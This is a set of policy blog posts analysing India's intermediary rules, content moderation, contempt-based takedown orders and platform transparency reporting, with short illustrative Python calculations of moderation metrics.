Re-thinking content moderation: structural solutions beyond the GAC

This post is authored by Sachin Dhawan and Vignesh Shanmugam

The grievance appellate committee (‘GAC’) provision in the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Amendment Rules, 2022 has garnered significant controversy. While it seeks to empower users to challenge the arbitrary moderation decisions of platforms, the provision itself has been criticised for being arbitrary. Lawyers, privacy advocates, technology companies, and other stakeholders have raised many concerns about the constitutional validity of the GAC, its lack of transparency and independence, and the excessive delegation of power it entails.

Although these continuing discussions on the GAC are necessary, they do not address the main concerns plaguing content moderation today. Even if sufficient legal and procedural safeguards are incorporated, the GAC will still be incapable of resolving the systemic issues in content moderation. This fundamental limitation persists because “governing content moderation by trying to regulate individual decisions is [like] using a teaspoon to remove water from a sinking ship”.  

Governments, platforms, and other stakeholders must therefore focus on: (i) examining the systemic issues which remain unaddressed by content moderation systems; and (ii) ensuring that platforms implement adequate structural measures to effectively reduce the number of individual grievances as well as systemic issues.

The limitations of current content moderation systems

Globally, a majority of platforms rely on an individual case-by-case approach for content moderation. Due to the limited scope of this method, platforms are unable to resolve, or even identify, several types of systemic issues. This, in turn, increases the number of content moderation cases.

To illustrate the problem, here are a few examples of systemic issues which are unaddressed by content moderation systems: (i) coordinated or periodic attacks (such as mass reporting of users/posts) which target a specific class of users (based on gender, sexuality, race, caste, religion, etc.); (ii) differing content moderation criteria in different geographical locations; and (iii) errors, biases or other issues with algorithms, programs or platform design which lead to increased flagging of users/posts for content moderation.

Considering the gravity of these systemic issues, platforms must adopt effective measures to improve the standards of content moderation and reduce the number of grievances.

Addressing the structural concerns in content moderation systems

Several legal scholars have recommended the adoption of a ‘systems thinking’ approach to address the various systemic concerns in content moderation. This approach requires platforms to implement corporate structural changes, administrative practices, and procedural accountability measures for effective content moderation and grievance redressal. 

Accordingly, revising the existing content moderation frameworks in India to include the following key ‘systems thinking’ principles would ensure fairness, transparency and accountability in content moderation.

  • Establishing independent content moderation systems. Although platforms have designated content moderation divisions, these divisions are, in many cases, influenced by the platforms’ corporate or financial interests, advertisers’ interests, or political interests, which directly impacts the quality and validity of their content moderation practices. Hence, platforms must implement organisational restructuring measures to ensure that content moderation and grievance redressal processes are (i) solely undertaken by a separate and independent ‘rule-enforcement’ division; and (ii) not overruled or influenced by any other division in the corporate structure of the platform. Additionally, platforms must designate a specific individual as the authorised officer in charge of the rule-enforcement division. This ensures transparency and accountability from a corporate governance viewpoint.
  • Robust transparency measures. Across jurisdictions, there is a growing trend of governments issuing formal or informal orders to platforms, including orders to suspend or ban specific accounts, take down specific posts, etc. In addition to ensuring transparency of the internal functioning of platforms’ content moderation systems, platforms must also provide clarity on the number of measures undertaken (and other relevant details) in compliance with such governmental orders. Ensuring that platforms’ transparency reports separately disclose the frequency and total number of such measures will provide a greater level of transparency to users, and the public at large.
  • Aggregation and assessment of claims. As stated earlier, individual cases provide limited insight into the overall systemic issues present on a platform. Platforms can gain a greater level of insight through (i) periodic aggregation of the claims received by them; and (ii) assessment of these aggregated claims for any patterns of harm or bias (for example, assessing for the presence of algorithmic/human bias against certain demographics; a minimal sketch of such an assessment follows this list). Doing so will illuminate algorithmic issues, design issues, unaccounted-for bias, or other systemic issues which would otherwise remain unidentified and unaddressed.
  • Annual reporting of systemic issues. In order to ensure internal enforcement of systemic reform, the rule-enforcement divisions must provide annual reports to the board of directors (or the appropriate executive authority of the platform), containing systemic issues observed, recommendations for certain systemic issues, and protective measures to be undertaken by the platforms (if any). To aid in identifying further systemic issues, the division must conduct comprehensive risk assessments on a periodic basis, and record its findings in the next annual report.
  • Implementation of accountability measures. As is established corporate practice for financial, accounting, and other divisions of companies, periodic quality assurance (‘QA’) and independent auditing of the rule-enforcement division will further ensure accountability and transparency.
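As a purely illustrative sketch of the claim-aggregation exercise described above (the schema, field names, and figures are hypothetical, not drawn from any platform's actual systems), a rule-enforcement division could periodically compute how often flags against each demographic are ultimately upheld; a group whose posts are flagged heavily but whose flags are rarely upheld is a candidate signal of mass reporting or biased flagging:

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class Claim:
    """A single moderation grievance (hypothetical schema)."""
    demographic: str  # group of the affected user (gender, caste, etc.)
    upheld: bool      # did the final decision confirm a genuine violation?

def upheld_rate_by_group(claims: list[Claim]) -> dict[str, float]:
    """Aggregate claims per demographic and compute the share of flags
    that were ultimately upheld. Outlier groups warrant closer review."""
    upheld, total = defaultdict(int), defaultdict(int)
    for c in claims:
        total[c.demographic] += 1
        upheld[c.demographic] += c.upheld  # bool counts as 0/1
    return {group: upheld[group] / total[group] for group in total}

# Illustrative data: group B is flagged just as often as group A, but
# its flags are rarely upheld -- a pattern that case-by-case review of
# individual grievances would never surface.
claims = ([Claim("A", True)] * 40 + [Claim("A", False)] * 10 +
          [Claim("B", True)] * 5 + [Claim("B", False)] * 45)
print(upheld_rate_by_group(claims))  # {'A': 0.8, 'B': 0.1}
```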

Conclusion

Current discussions regarding content moderation regulations are primarily centred around the GAC, and the various procedural safeguards which can rectify its flaws. However, even if the GAC becomes an effectively functioning independent appellate forum, the systemic problems plaguing content moderation will remain unresolved. It is for this reason that platforms must actively adopt the structural measures suggested above. Doing so will (i) increase the quality of content moderation and internal grievance decisions; (ii) reduce the burden on appellate forums; and (iii) decrease the likelihood of governments imposing stringent content moderation regulations that undermine the free speech rights of users.

Comments on the draft amendments to the IT Rules (Jan 2023)

The Ministry of Electronics and Information Technology (“MeitY”) proposed amendments to the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“Intermediary Guidelines”) on January 17, 2023. The draft amendments aim to regulate online gaming, but also seek to have intermediaries “make reasonable efforts” to cause their users not to upload or share content identified as “fake” or “false” by the Press Information Bureau (“PIB”), any Union Government department or authorised agency (See proposed amendment to Rule 3(1)(b)(v).) The draft amendments in their current form raise certain concerns that we believe merit additional scrutiny.  

CCG submitted comments on the proposed amendment to Rule 3(1)(b)(v), highlighting its key feedback and concerns. The comments were authored by Archit Lohani and Vasudev Devadasan and reviewed by Sachin Dhawan and Jhalak M. Kakkar. Some of the key issues raised in our comments are summarised below.

  1. ‘Misinformation’, ‘fake’, and ‘false’ content include both unlawful and lawful expression

The proposed amendment does not define the term “misinformation” or provide any guidance on how determinations that content is “fake” or “false” are arrived at. Misinformation can take various forms, and experts have identified up to seven subtypes: imposter content; fabricated content; false connection; false context; manipulated content; misleading content; and satire or parody. Different subtypes of misinformation can cause different types of harm (or no harm at all) and are treated differently under the law. Misinformation or false information thus includes both lawful and unlawful speech (e.g., satire is constitutionally protected speech).

Within the broad ambit of misinformation, the draft amendment does not provide sufficient guidance to the PIB and government departments on what sort of expression is permissible and what should be restricted. The draft amendment effectively provides them with unfettered discretion to restrict both unlawful and lawful speech. When seeking to regulate misinformation, experts, platforms, and other countries have drawn up detailed definitions that take into consideration factors such as intention, form of sharing, virality, context, impact, public interest value, and public participation value. These definitions recognize the potential multiplicity of context, content, and propagation techniques. In the absence of clarity over what types of content may be restricted based on a clear definition of misinformation, the draft amendment will restrict both unlawful speech and constitutionally protected speech. It will thus constitute an overbroad restriction on free speech.

  2. Restricting information solely on the ground that it is “false” is constitutionally impermissible

Article 19(2) of the Indian Constitution allows the State to impose reasonable restrictions on free speech in the interests of the sovereignty and integrity of India, the security of the State, friendly relations with foreign States, public order, decency or morality, or in relation to contempt of court, defamation, or incitement to an offence. The Supreme Court has ruled that these grounds are exhaustive and speech cannot be restricted for reasons beyond Article 19(2), including where the government seeks to block content online. Crucially, Article 19(2) does not permit the State to restrict speech on the ground that it is false. If the government were to restrict “false information that may imminently cause violence”, such a restriction would be permissible as it would relate to the ground of “public order” in Article 19(2). However, if enacted, the draft amendment would restrict online speech solely on the ground that it is declared “false” or “fake” by the Union Government. This amounts to a State restriction on speech for reasons beyond those outlined in Article 19(2), and would thus be unconstitutional. Restrictions on free speech must have a direct connection to the grounds outlined in Article 19(2) and must be a necessary and proportionate restriction on citizens’ rights.

  3. Amendment does not adhere to the procedures set out in Section 69A of the IT Act

The Supreme Court upheld Section 69A of the IT Act in Shreya Singhal v Union of India inter alia because it permitted the government to block online content only on grounds consistent with Article 19(2) and provided important procedural safeguards, including a notice, hearing, and written order of blocking that can be challenged in court. It is therefore evident that the constitutionality of the government’s blocking power over online content is contingent on the substantive and procedural safeguards provided by Section 69A and the Information Technology (Procedure and Safeguards for Blocking for Access of Information by Public) Rules, 2009. The proposed amendment to the Intermediary Guidelines would permit the Union Government to restrict online speech in a manner that does not adhere to these safeguards. It would permit the blocking of content on grounds beyond those specified in Article 19(2), based on a unilateral determination by the Union Government, without a specific procedure for notice, hearing, or a written order.

  4. Alternative methods to counter the spread of misinformation

Any response to misinformation on social media platforms should be based on empirical evidence of the prevalence and harms of misinformation on social media. Thus, as a first step, social media companies should be required to provide greater transparency and facilitate researcher access to data. There are alternative methods to regulate the spread of misinformation that may be more effective and preserve free expression, such as labelling or flagging misinformation. We note that there does not yet exist widespread legal and industry consensus on standards for independent fact-checking, but organisations such as the International Fact-Checking Network (IFCN) have laid down certain principles that independent fact-checking organisations should comply with. Having platforms label content pursuant to IFCN fact-checks, and even notify users when content they have interacted with has subsequently been flagged by an IFCN fact-checker, would provide users with valuable informational context without requiring content removal.

Guest Post: The Case Against Requiring Social Media Companies to Proactively Monitor for ‘Anti-Judiciary Content’

This post is authored by Dhruv Bhatnagar

Through an order dated July 19, 2022 (“Order”), Justice G.R. Swaminathan of the Madras High Court initiated proceedings for criminal contempt against YouTuber ‘Savukku’ Shankar. The genesis of this case is a tweet in which Shankar questioned who Justice Swaminathan met before delivering a verdict quashing criminal proceedings against another content creator. Shankar’s tweet on Justice Swaminathan has been described in the Order as ‘an innuendo intended to undermine the judge’s integrity’.

In the Order, Justice Swaminathan has observed that Chief Compliance Officers (“CCOs”) of social media companies (“SMCs”) are obligated to ensure that “content scandalising judges and judiciary” is not posted on their platforms “and if posted, [is] taken down”. To contain the proliferation of ‘anti-judiciary content’ on social media, Facebook, Twitter, and YouTube have been added as parties to this case. Their CCOs have been directed to document details of complaints received against Shankar and explain whether they have considered taking proactive steps to uphold the dignity of the judiciary.

Given that users access online speech through SMCs, compelling SMCs to exercise censorial power on behalf of State authorities is not a novel development. However, suo motu action to regulate ‘anti-judiciary content’ in India may create more problems than it would solve. After briefly discussing inconsistencies in India’s criminal contempt jurisprudence, this piece highlights the legal issues with standing judicial orders directing SMCs to proactively monitor for ‘anti-judiciary content’ on their platforms. It also catalogues the practical difficulties such orders would pose for SMCs and argues against the imposition of onerous proactive moderation obligations upon them, to prevent the curtailment of users’ freedom of speech.

Criminal contempt in India: Contours and Splintered Jurisprudence

The Contempt of Courts Act, 1971 (“1971 Act”) codifies contempt both as a civil and criminal offence in India. Civil contempt refers to wilful disobedience of judicial pronouncements, whereas criminal contempt is defined as act(s) that either scandalise or lower the authority of the judiciary, interfere with the due course of judicial proceedings, or obstruct the administration of justice. Both types of contempt are punishable with a fine of up to Rs. 2,000/-, imprisonment of up to six months, or both. The Supreme Court and High Courts, as courts of record, are both constitutionally (under Articles 129 and 215) and statutorily (under Section 15 of the 1971 Act) empowered to punish individuals for contempt of themselves.

Given that “scandalis[ing]” or “tend[ing] to scandalise” a court is a broad concept, judicial interpretation and principles constitute a crucial source for understanding the remit of this offence. However, there is little consistency on this front owing to a divergence in judicial decisions over the years, with some courts construing the offence in narrow terms and others broadly.

In 1978, Justice V.R. Krishna Iyer enunciated, inter-alia, the following guidelines for exercising criminal contempt jurisdiction in S. Mulgaokar (analysed here):

  • Courts should exercise a “wise economy of use” of their contempt power and should not be prompted by “easy irritability” (¶27).
  • Courts should strike a balance between the constitutional values of free criticism and the need for a fearless judicial process while deciding contempt cases. The benefit of doubt must always be given since even fierce or exaggerated criticism is not a crime (¶28).
  • Contempt is meant to prevent obstruction of justice, not offer protection to libelled judges (¶29).
  • Judges should not be hypersensitive to criticism. Instead, they should endeavour to deflate even vulgar denunciation through “condescending indifference…” (¶32).

Later, in P.N. Duda (analysed here), the Supreme Court restricted the scope of criminal contempt only to actions having a proximate connection to the obstruction of justice. The Court found that a minister’s speech assailing its judges for being prejudiced against the poor, though opinionated, was not contemptuous since it did not impair the administration of justice.

However, subsequent judgments have not always adopted this tolerant stance. For instance, in D.C. Saxena (analysed here), the Supreme Court found that the essence of this offence was lowering the dignity of judges, and even mere imputations of partiality were contemptuous. Later, in Arundhati Roy (analysed here), the Supreme Court held that opinions capable of diminishing public confidence in the judiciary also attract contempt. Here, the Court noted that the respondent had caused public injury by creating a negative impression in the minds of the people about judicial integrity. This line of reasoning deviates from Justice Krishna Iyer’s guidelines in Mulgaokar, which had advised against using contempt merely to defend the maligned reputation of judges. Not only does this rationale allow for easier invocation of the offence of contempt, but it is also premised on a paternalistic assumption that India’s impressionable citizenry may be swayed by malicious and irrelevant vilification of the judiciary.

Given the above disparity in judicial opinions, Shankar’s guilt ultimately depends on the standards applied to determine the legality of his tweet. As per the Mulgaokar principles, Shankar’s tweet may not be contemptuous since it does not present an imminent danger of interference with the administration of justice. However, if assessed according to the Saxena or Roy standard, the tweet could be considered contemptuous simply because it imputes ulterior motives to Justice Swaminathan’s decision-making.

It is submitted that the Mulgaokar principles align more closely with the constitutional requirement that restrictions on speech be ‘reasonable’, as the principles advocate restricting only speech that constitutes a proximate threat to a permissible state aim (contempt of court) set out in Article 19(2). For this reason, as a general practice, it may be advisable for judges to consistently apply and endorse these principles while deciding criminal contempt cases.

Difficulties in proactive regulation of ‘anti-judiciary content’

Justice Swaminathan’s observation in the Order that SMCs have a ‘duty to ensure content scandalising judges is not posted, and if posted is taken down’ suggests that he expects such content to be proactively identified and removed by SMCs from their platforms. However, practically, standing judicial orders imposing such broad obligations upon SMCs would not only exceed their obligations under extant Indian law but may also lead to legal speech being taken down. These concerns are elaborated below:

Incompatibility with legal obligations:

Although the Information Technology Act, 2000 does not specifically require SMCs to proactively monitor content, an obligation of this nature has been introduced through delegated legislation in Rule 4(4) of the 2021 IT Rules. This rule requires SMCs qualifying as ‘significant social media intermediaries’ (“SSMIs”) (explained here) to, inter alia, “endeavour to deploy” technological measures to proactively identify content depicting rape or child sexual abuse, or content identical to information previously disabled pursuant to governmental or judicial orders. However, ‘anti-judiciary content’ is not a content category which SSMIs must endeavour to proactively identify. Thus, any judicial direction imposing this mandate upon them would exceed the scope of their legal obligations.

Further, in Shreya Singhal (analysed here), the Supreme Court expressly required a court order determining the illegality of content to be passed before SMCs were required to remove the content. However, if proactive monitoring obligations are imposed, SMCs would have to identify and remove content on their own, without a judicial determination of legality. Such obligations would also undermine the Court’s ruling in Visakha Industries (analysed here), which advised against proactive monitoring to prevent intermediaries from becoming “super censors” and “denud[ing] the internet of it[s] unique feature [as] a democratic medium for all to publish, access and read any and all kinds of information” (¶53).

Unrealistic expectations and undesirable content moderation outcomes:

Judicial orders directing SMCs to proactively disable ‘anti-judiciary content’ essentially require them to objectively and consistently enforce standards on criminal contempt on their platforms. This may be problematic considering that the doctrine of contempt emerging from constitutional courts, where judges possess a significantly higher degree of specialised knowledge on what constitutes contempt of court, is itself ambiguous at best. Put simply, when even courts have regularly disagreed on the contours of contemptuous speech, it may be problematic to expect SMCs to take more coherent decisions.

A major risk with delegating the burden of complex decision-making about free speech to private intermediaries is excessive content removal. Across jurisdictions, platform providers have erred on the side of caution and over-removed content when faced with potential legal risks. This is evidenced through empirical studies on the notice-takedown regime for copyright infringing content in the US and due diligence obligations for intermediaries in India.

Given their documented propensity for over-compliance, directions by Indian courts requiring SMCs to proactively take down ‘anti-judiciary content’ may incentivise excessive removal of even permissible critique of judicial actions. This would ultimately restrict social media users’ right to free expression.

Way forward

Considering the issues outlined above, it may be advisable for the Madras High Court to refrain from imposing proactive monitoring obligations upon SMCs. Consistent with the Mulgaokar principles, judges should issue blocking directions for online contemptuous speech, in exercise of their criminal contempt jurisdiction, only against content which poses a credible threat of obstructing justice, and not against content which they perceive as lowering their reputation. Such directions should also identify specific pieces of content and not impose broad obligations on SMCs that may ultimately restrict free expression.

CCG’s Comments to the Ministry of Electronics & Information Technology on the proposed amendments to the Intermediary Guidelines 2021

On 6 June 2022, the Ministry of Electronics and Information Technology (“MeitY”) released the proposed amendments to Part I and Part II of the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“2021 IT Rules”). CCG submitted its comments on the proposed amendments, highlighting its key feedback and concerns. The comments were authored by Vasudev Devadasan and Bilal Mohamed and reviewed and edited by Jhalak M Kakkar and Shashank Mohan.

The 2021 IT Rules were released in February 2021, and Parts I and II set out the conditions intermediaries must satisfy to avail of legal immunity for hosting unlawful content (or ‘safe harbour’) under Section 79 of the Information Technology Act, 2000 (“IT Act”). The 2021 IT Rules have been challenged in several High Courts across the country, and the Supreme Court is currently hearing a transfer petition on whether these challenges should be clubbed and heard collectively by the apex court. In the meantime, MeitY has released the proposed amendments, which seek to make incremental but significant changes to the Rules.

CCG’s comments to the MeitY can be summarised as follows:

Dilution of safe harbour in contravention of Section 79(1) of the IT Act

The core intention behind providing intermediaries with safe harbour under Section 79(1) of the IT Act is to ensure that intermediaries do not restrict the free flow of information online due to the risk of being held liable for third-party content uploaded by users. The proposed amendments to Rules 3(1)(a) and 3(1)(b) of the 2021 IT Rules potentially impose an obligation on intermediaries to “cause” and “ensure” that their users do not upload unlawful content. These amendments may require intermediaries to make complex determinations on the legality of speech and cause them to remove content that carries even the slightest risk of liability. This may result in the restriction of online speech and the corporate surveillance of Indian internet users by intermediaries. In the event that the proposed amendments are interpreted as not requiring intermediaries to actively prevent users from uploading unlawful content, we note that the amendments may be functionally redundant, and we suggest they be dropped to avoid legal uncertainty.

Concerns with Grievance Appellate Committee

The proposed amendments envisage one or more Grievance Appellate Committees (“GAC”) that sit in appeal of intermediary determinations with respect to content. Users may appeal to a GAC against the decision of an intermediary to not remove content despite a user complaint, or alternatively, request a GAC to reinstate content that an intermediary has voluntarily removed or lift account restrictions that an intermediary has imposed. The creation of GAC(s) may exceed the Government’s rulemaking powers under the IT Act. Further, the GAC(s) lack the necessary safeguards in their composition and operation to ensure the independence required by law of such an adjudicatory body. Such independence and impartiality may be essential as the Union Government is responsible for appointing individuals to the GAC(s), but the Union Government or its functionaries or instrumentalities may also be a party before the GAC(s). Further, we note that the originator, the legality of whose content is in dispute before a GAC, has not expressly been granted a right to a hearing before the GAC. Finally, we note that the GAC(s) may lack the capacity to deal with the high volume of appeals against content and account restrictions. This may lead to situations where, in practice, only a small number of internet users are afforded redress by the GAC(s), leading to inequitable outcomes and discrimination amongst users.

Concerns with grievance redressal timeline

Under the proposed amendment to Rule 3(2), intermediaries must acknowledge a complaint by an internet user for the removal of content within 24 hours, and ‘act and redress’ the complaint within 72 hours. CCG’s comments note that the 72-hour timeline proposed by the amendment to Rule 3(2) may cause online intermediaries to over-comply with content removal requests, leading to the possible take-down of legally protected speech at the behest of frivolous user complaints. Empirical studies conducted on Indian intermediaries have demonstrated that smaller intermediaries lack the capacity and resources to make complex legal determinations of whether the content complained against violates the standards set out in Rule 3(1)(b)(i)-(x), while larger intermediaries are unable to address the high volume of complaints within short timelines, leading to the mechanical takedown of content. We suggest that any requirement that online intermediaries address user complaints within short timelines could differentiate between content that is ex-facie (on the face of it) illegal and causes severe harm (e.g., child sexual abuse material or gratuitous violence), and other types of content where determinations of legality may require legal or judicial expertise, such as copyright or defamation.

Need for specificity in defining due diligence obligations

Rule 3(1)(m) of the proposed amendments requires intermediaries to ensure a “reasonable expectation of due diligence, privacy and transparency” to avail of safe harbour, while Rule 3(1)(n) requires intermediaries to “respect the rights accorded to the citizens under the Constitution of India.” These rules do not impose clearly ascertainable legal obligations, which may increase compliance burdens, hamper enforcement, and result in inconsistent outcomes. In the absence of specific data protection legislation, the obligation to ensure a “reasonable expectation of due diligence, privacy and transparency” is unclear. The contents of fundamental rights obligations were drafted and developed in the context of citizen-State relations and may not be suitable for, or aptly transposed to, the relations between intermediaries and users. Further, the content of ‘respecting Fundamental Rights’ under the Constitution is itself contested and open to reasonable disagreement between various State and constitutional functionaries. Requiring intermediaries to uphold such obligations will likely lead to inconsistent outcomes based on varied interpretations.

Transparency reporting under the Intermediary Guidelines is a mess: Here’s how we can improve it

The Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“Intermediary Guidelines”) represent India’s first attempt at regulating large social media platforms, with the Guidelines creating distinct obligations for ‘Significant Social Media Intermediaries’ (“SSMIs”). While certain provisions of the Guidelines concerning SSMIs (like the traceability requirement) are currently under legal challenge, the Guidelines also introduced a less controversial requirement that SSMIs publish monthly transparency reports regarding their content moderation activities. While this reporting requirement is arguably a step in the right direction, scrutinising the actual documents published by SSMIs reveals a patchwork of inconsistent and incomplete information, suggesting that Indian regulators need to adopt a more comprehensive approach to platform transparency.

This post briefly sets out the reporting requirement under the Intermediary Guidelines before analysing the transparency reports released by SSMIs. It highlights how a focus on figures, coupled with the wide discretion granted to platforms to frame their reports, undermines the goal of meaningful transparency. The figures referred to when analysing SSMI reports pertain to the February-March 2022 reporting period, but the distinct methodologies used by each SSMI to arrive at these figures (more relevant for the present discussion) have remained broadly unchanged since reporting began in mid-2021. The post concludes by making suggestions on how the Ministry of Electronics and Information Technology (“MeitY”) can strengthen the reporting requirements under the Intermediary Guidelines.

Transparency reporting under the Intermediary Guidelines

Social media companies structure speech on their platforms through their content moderation policies and practices, which determine when content stays online and when it is taken down. Even if content is not illegal or taken down pursuant to a court or government order, platforms may still take it down for violating their terms of service (or Community Guidelines); let us call this ‘violative content’, i.e., content that violates the terms of service. However, ineffective content moderation can result in violative and even harmful content remaining online, or non-violative content mistakenly being taken down. Given the centrality of content moderation to online speech, the Intermediary Guidelines seek to bring some transparency to the content moderation practices of SSMIs by requiring them to publish monthly reports on their content moderation activities. Transparency reporting helps users and the government understand the decisions made by platforms with respect to online speech. Given the opacity with which social media platforms often operate, transparency reporting requirements can be an essential tool to hold platforms accountable for ineffective or discriminatory content moderation practices.

Rule 4(1)(d) of the Intermediary Guidelines requires SSMIs to publish monthly transparency reports specifying: (i) the details of complaints received and actions taken in response; (ii) the number of “parts of information” proactively taken down using automated tools; and (iii) any other relevant information specified by the government. The Rule therefore covers both ‘reactive moderation’, where a platform responds to a user’s complaint against content, and ‘proactive moderation’, where the platform itself seeks out unwanted content even before a user reports it.

Transparency around reactive moderation helps us understand trends in user reporting and how responsive an SSMI is to user complaints, while disclosures on proactive moderation shed light on the scale and accuracy of an SSMI’s independent moderation activities. A key goal of both reporting datasets is to understand whether the platform is taking down as much harmful content as possible without accidentally also taking down non-violative content. Unfortunately, Rule 4(1)(d) merely requires SSMIs to report the number of links taken down during their content moderation (this is reiterated by MeitY’s FAQs on the Intermediary Guidelines). The problems with an overly simplistic approach come to the fore upon an examination of the actual reports published by SSMIs.

Contents of SSMI reports – proactive moderation

Based on their latest monthly transparency reports, Twitter proactively suspended 39,588 accounts while Google used automated tools to remove 338,938 pieces of content. However, these figures only document the scale of proactive monitoring and provide no insight into the accuracy of the platforms’ moderation, i.e., how well the moderation distinguishes between violative and non-violative content. The reporting also does not specify whether this content was taken down using solely automated tools, or some mix of automated tools and human review or oversight. Meta (reporting for Facebook and Instagram) reports the volume of content proactively taken down, but also provides a “Proactivity Rate”. The Proactivity Rate is defined as the percentage of content flagged proactively (before a user reported it) as a subset of all flagged content: Proactivity Rate = [proactively flagged content ÷ (proactively flagged content + user reported content)]. However, this metric is also of little use in understanding the accuracy of Meta’s automated tools. Take the following example:

Assume a platform has 100 pieces of content, of which 50 violate the platform’s terms of service and 50 do not. The platform relies on both proactive monitoring through automated tools and user reporting to identify violative content. Now, if the automated tools detect 49 pieces of violative content, and a user reports 1, the platform reports: ‘49 pieces of content were taken down pursuant to proactive monitoring at a Proactivity Rate of 98%’. However, this reporting does not inform citizens or regulators: (i) whether the 49 pieces of content identified by the automated tools are in fact among the 50 that violate the platform’s terms of service (or whether the tools mistakenly took down some legitimate, non-violative content); (ii) how many users saw but did not report the content that was eventually flagged by automated tools and taken down; and (iii) what level and extent of human oversight was exercised in removing content. A high proactivity rate merely indicates that automated tools flagged more content than users, which is to be expected. Simply put, numbers aren’t everything: they only disclose the scale of content moderation, not its quality.
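To make this limitation concrete, here is a minimal sketch (with invented figures, not drawn from any SSMI report) showing that two platforms can publish an identical Proactivity Rate while differing sharply in how accurately their automated tools identify violative content:

```python
def proactivity_rate(proactive_flags: int, user_reports: int) -> float:
    """Share of all flagged content that was flagged proactively.
    This is the metric Meta reports; it says nothing about accuracy."""
    return proactive_flags / (proactive_flags + user_reports)

def precision(true_violations: int, proactive_flags: int) -> float:
    """Share of proactively flagged items that actually violated the
    terms of service -- the accuracy figure the reports omit."""
    return true_violations / proactive_flags

# Both hypothetical platforms flag 49 items proactively against 1 user
# report, so both report the same 98% Proactivity Rate...
print(proactivity_rate(49, 1))   # 0.98

# ...but platform A's tools were right 49 out of 49 times, while
# platform B's were right only 25 out of 49 times (24 legitimate posts
# wrongly removed). Identical rate, very different quality.
print(precision(49, 49))         # 1.00
print(precision(25, 49))         # ~0.51
```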

This criticism raises the question: how does one assess the quality of proactive moderation? The Santa Clara Principles represent high-level guidance on content moderation practices developed by international human rights organisations and academic experts to facilitate platform accountability with respect to users’ speech. The Principles require that platforms report: (i) when and how automated tools are used; (ii) the key criteria used by automated tools in making decisions; (iii) the confidence, accuracy, or success rate of automated tools, including in different languages; (iv) the extent of human oversight over automated tools; and (v) the outcomes of appeals against moderation decisions made by automated tools. This last requirement, reporting the outcome of appeals (how many users successfully got content reinstated after it was taken down by proactive monitoring), is a particularly useful metric as it indicates when the platforms themselves acknowledge that their proactive moderation was inaccurate. Draft legislation in Europe and the United States requires platforms to report how often proactive monitoring decisions are reversed. Mandating the reporting of even some of these elements under the Intermediary Guidelines would provide a clearer picture of the accuracy of proactive moderation.
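A minimal sketch of the reversal metric described above (the numbers are hypothetical):

```python
def appeal_reversal_rate(reinstated: int, appealed: int) -> float:
    """Fraction of appealed proactive takedowns that the platform
    itself reversed -- a self-acknowledged error signal."""
    return reinstated / appealed if appealed else 0.0

# Hypothetical: 200 of 1,000 appealed takedowns were reinstated,
# i.e. the platform conceded a 20% error rate among appealed cases.
print(appeal_reversal_rate(200, 1_000))  # 0.2
```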

Finally, it is relevant to note that Rule 4(4) of the Intermediary Guidelines requires that the automated tools used for proactive monitoring of certain classes of content be ‘reviewed for accuracy and fairness’. The desirability of such proactive monitoring aside, Rule 4(4) is not self-enforcing and does not specify who should undertake this review, how often it should be carried out, or to whom the results should be communicated.

Contents of SSMI reports – reactive moderation

Transparency reporting with respect to reactive moderation aims to understand trends in user reporting of content and a platform’s responses to user flagging of content. Rule 4(1)(d) requires platforms to disclose the “details of complaints received and actions taken thereon”. However, a perusal of SSMI reporting reveals how the broad discretion granted to SSMIs to frame their reports is undermining the usefulness of the reporting.  

Google’s transparency report adopts the most straightforward understanding of “complaints received”, with the platform disclosing the number of ‘complaints that relate to third-party content that is believed to violate local laws or personal rights’. In other words, where users raise a complaint against a piece of content, Google reports it (30,065 complaints in February 2022). Meta, on the other hand, only reports complaints from: (i) a specific contact form, a link to which is provided in its ‘Help Centre’; and (ii) complaints addressed to the physical post-box address published on the ‘Help Centre’. For February 2022, Facebook received a mere 478 complaints, of which only 43 pertained to content (inappropriate or sexual content), while 135 were from users whose accounts had been hacked, and 59 were from users who had lost access to a group or page. If 43 user reports a month against content on Facebook seems suspiciously low, it likely is: the method of reporting content that involves the least friction for users (simply clicking on the post and reporting it directly) bypasses the specific contact form that Facebook uses to collate Indian complaints, and thus appears to be absent from Facebook’s transparency reporting. Most of Facebook’s 478 complaints for February have nothing to do with content on Facebook and offer little insight into how Facebook responds to user complaints against content or what types of content users report.

In contrast, Twitter’s transparency reporting expressly states that it does not include non-content-related complaints (e.g., a user locked out of their account), instead limiting itself to content-related complaints: 795 complaints for March 2022, with abuse or harassment (606), hateful conduct (97), and misinformation (33) as the top categories. However, like Facebook, Twitter also has both a ‘support form’ and allows users to report content directly by clicking on it, but fails to specify from what sources “complaints” are compiled for its India transparency reports. Twitter merely notes that ‘users can report grievances by the grievance mechanism by using the contact details of the Indian Grievance Officer’.

These apparent discrepancies in the number of complaints reported bear even greater scrutiny when the number of users of these platforms is factored in. Twitter (795 complaints/month) has an estimated 23 million users in India, while Facebook (478 complaints/month) has an estimated 329 million users. It is reasonable to expect user complaints to scale with the number of users, but this is evidently not happening, which suggests that these platforms are using different sources and methodologies to determine what constitutes a “complaint” for the purposes of Rule 4(1)(d). This is perhaps a useful time to discuss another SSMI, ShareChat.

ShareChat is reported to have an estimated 160 million users, and for February 2022 the platform reported 56,81,213 (roughly 5.7 million) user complaints, substantially more than Twitter and Facebook. These complaints are content-related (e.g., hate speech, spam, etc.), although with 30% of complaints merely classified as ‘Others’, there is some uncertainty as to what they pertain to. ShareChat’s report states that it collates complaints from ‘reporting mechanism[s] across the platform’. This would suggest that, unlike Facebook (and potentially Twitter), it compiles user complaint numbers from all the methods by which a user can complain against content, and not just a single form tucked away in its help centre documentation. While this may be a more holistic approach, ShareChat’s reporting suffers from other crucial deficiencies: its report makes no distinction between reactive and proactive moderation, merely giving a single figure for content that has been taken down. This makes it hard to judge how ShareChat responded to these more than 56,00,000 complaints.
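Normalising these reported counts by estimated user base (a rough, illustrative calculation using the figures cited in this post; the user numbers are estimates) makes the incomparability of the platforms’ notions of a “complaint” stark:

```python
# Reported monthly complaints and estimated Indian user bases, as cited
# above (Facebook's February 2022 figure of 478; estimates only).
platforms = {
    "Twitter":   (795,        23_000_000),
    "Facebook":  (478,       329_000_000),
    "ShareChat": (5_681_213, 160_000_000),
}

for name, (complaints, users) in platforms.items():
    per_million = complaints / (users / 1_000_000)
    print(f"{name}: ~{per_million:,.1f} complaints per million users")

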